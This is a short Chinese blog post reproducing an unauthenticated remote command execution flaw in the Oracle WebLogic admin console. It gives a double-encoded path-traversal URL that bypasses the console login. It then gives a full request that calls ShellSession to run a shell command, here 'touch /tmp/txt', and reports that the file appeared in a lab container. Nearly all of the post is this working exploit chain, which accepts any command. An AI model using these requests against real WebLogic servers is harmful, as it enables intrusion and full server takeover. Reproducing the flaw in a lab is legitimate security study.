weblogic管理控制台未授权远程命令执行漏洞复现

阅读 49

2022-04-14

ip:/console进入登录页面

然后我们输入

ip:7001/console/css/%252e%252e%252fconsole.portal进行登陆绕过

然后我们进行访问

http://ip:7001/console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession("java.lang.Runtime.getRuntime().exec('touch%20/tmp/txt');")

利用com.tangosol.coherence.mvel2.sh.ShellSession执行命令

 

我们看到页面回显404,进入环境漏洞容器中查看文件是否被建立

可以看到文件已经被成功建立

 

精彩评论(0)

0 0 举报